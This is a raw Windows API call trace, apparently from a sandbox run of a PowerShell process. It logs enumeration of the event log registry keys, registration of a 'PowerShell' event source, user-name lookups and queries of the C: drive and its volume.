	[0226.625] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.625] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.625] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.625] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.626] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.626] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.626] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.626] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.627] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.627] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x380) returned 0x0
	[0226.627] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.627] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x384) returned 0x0
	[0226.628] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.628] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x388) returned 0x0
	[0226.628] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.628] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x38c) returned 0x0
	[0226.629] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.629] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x390) returned 0x0
	[0226.629] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.629] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x394) returned 0x0
	[0226.630] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.630] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x398) returned 0x0
	[0226.630] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.630] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x39c) returned 0x0
	[0226.630] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.631] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3a0) returned 0x0
	[0226.631] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3a4) returned 0x0
	[0226.631] RegCloseKey (hKey=0x3a4) returned 0x0
	[0226.631] RegCloseKey (hKey=0x338) returned 0x0
	[0226.632] RegCloseKey (hKey=0x3a0) returned 0x0
	[0226.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea0c | out: phkResult=0x10ea0c*=0x3a0) returned 0x0
	[0226.632] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ea74, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea70, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ea74*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea70*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.632] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.633] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.633] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.633] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.633] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.633] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.634] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.634] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.634] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x5090b0, lpcchName=0x10ea90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10ea90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.634] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x338) returned 0x0
	[0226.635] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.635] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3a4) returned 0x0
	[0226.635] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.635] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3a8) returned 0x0
	[0226.636] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.636] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3ac) returned 0x0
	[0226.636] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.637] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3b0) returned 0x0
	[0226.637] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.637] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3b4) returned 0x0
	[0226.637] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.702] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3b8) returned 0x0
	[0226.702] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.702] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3bc) returned 0x0
	[0226.702] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x0) returned 0x2
	[0226.702] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3c0) returned 0x0
	[0226.703] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea3c | out: phkResult=0x10ea3c*=0x3c4) returned 0x0
	[0226.703] RegCloseKey (hKey=0x3c4) returned 0x0
	[0226.703] RegCloseKey (hKey=0x3a0) returned 0x0
	[0226.704] RegCloseKey (hKey=0x3c0) returned 0x0
	[0226.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea00 | out: phkResult=0x10ea00*=0x3c0) returned 0x0
	[0226.704] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ea68, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea64, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ea68*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea64*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.704] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x0, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.705] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x1, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.705] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x2, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.705] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x3, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.705] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x4, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.705] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x5, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.706] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x6, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.706] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x7, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.706] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x8, lpName=0x5090b0, lpcchName=0x10ea84, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10ea84, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.706] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3a0) returned 0x0
	[0226.706] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.706] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3c4) returned 0x0
	[0226.707] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.707] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3c8) returned 0x0
	[0226.707] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.708] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3cc) returned 0x0
	[0226.708] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.708] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3d0) returned 0x0
	[0226.708] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.708] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3d4) returned 0x0
	[0226.709] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.709] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3d8) returned 0x0
	[0226.709] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.709] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3dc) returned 0x0
	[0226.710] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x0) returned 0x2
	[0226.710] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3e0) returned 0x0
	[0226.710] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea30 | out: phkResult=0x10ea30*=0x3e4) returned 0x0
	[0226.710] RegCloseKey (hKey=0x3e4) returned 0x0
	[0226.711] RegCloseKey (hKey=0x3c0) returned 0x0
	[0226.711] RegCloseKey (hKey=0x3e0) returned 0x0
	[0226.715] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4e90004
	[0226.880] GetLastError () returned 0x0
	[0226.881] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32668b8*="WSMan", lpRawData=0x3266760) returned 1
	[0226.881] GetLastError () returned 0x0
	[0226.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.882] GetLastError () returned 0xcb
	[0226.883] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0226.884] GetLastError () returned 0xcb
	[0226.884] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0226.884] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x326a794*="Alias", lpRawData=0x326a650) returned 1
	[0226.885] GetLastError () returned 0x0
	[0226.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.886] GetLastError () returned 0xcb
	[0226.887] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0226.887] GetLastError () returned 0xcb
	[0226.887] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0226.888] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x326e728*="Environment", lpRawData=0x326e5e4) returned 1
	[0226.888] GetLastError () returned 0x0
	[0226.889] GetLogicalDrives () returned 0x4
	[0226.889] GetLastError () returned 0xcb
	[0226.890] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e5f8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.890] GetLastError () returned 0xcb
	[0226.891] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.891] GetLastError () returned 0xcb
	[0226.891] SetErrorMode (uMode=0x1) returned 0x1
	[0226.893] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x5091b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10eb20, lpMaximumComponentLength=0x10eb1c, lpFileSystemFlags=0x10eb18, lpFileSystemNameBuffer=0x5090b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10eb20*=0x9c354b42, lpMaximumComponentLength=0x10eb1c*=0xff, lpFileSystemFlags=0x10eb18*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0226.893] GetLastError () returned 0xcb
	[0226.894] SetErrorMode (uMode=0x1) returned 0x1
	[0226.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.894] GetLastError () returned 0xcb
	[0226.894] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e680, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.894] GetLastError () returned 0xcb
	[0226.894] SetErrorMode (uMode=0x1) returned 0x1
	[0226.894] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x326f960 | out: lpFileInformation=0x326f960*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.894] GetLastError () returned 0xcb
	[0226.894] SetErrorMode (uMode=0x1) returned 0x1
	[0226.894] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e680, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.894] GetLastError () returned 0xcb
	[0226.894] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e60c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.894] GetLastError () returned 0xcb
	[0226.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.894] GetLastError () returned 0xcb
	[0226.896] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.896] GetLastError () returned 0xcb
	[0226.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.896] GetLastError () returned 0xcb
	[0226.897] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.897] GetLastError () returned 0xcb
	[0226.897] SetErrorMode (uMode=0x1) returned 0x1
	[0226.897] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x32705b8 | out: lpFileInformation=0x32705b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.897] GetLastError () returned 0xcb
	[0226.897] SetErrorMode (uMode=0x1) returned 0x1
	[0226.897] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e5d8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.897] GetLastError () returned 0xcb
	[0226.897] SetErrorMode (uMode=0x1) returned 0x1
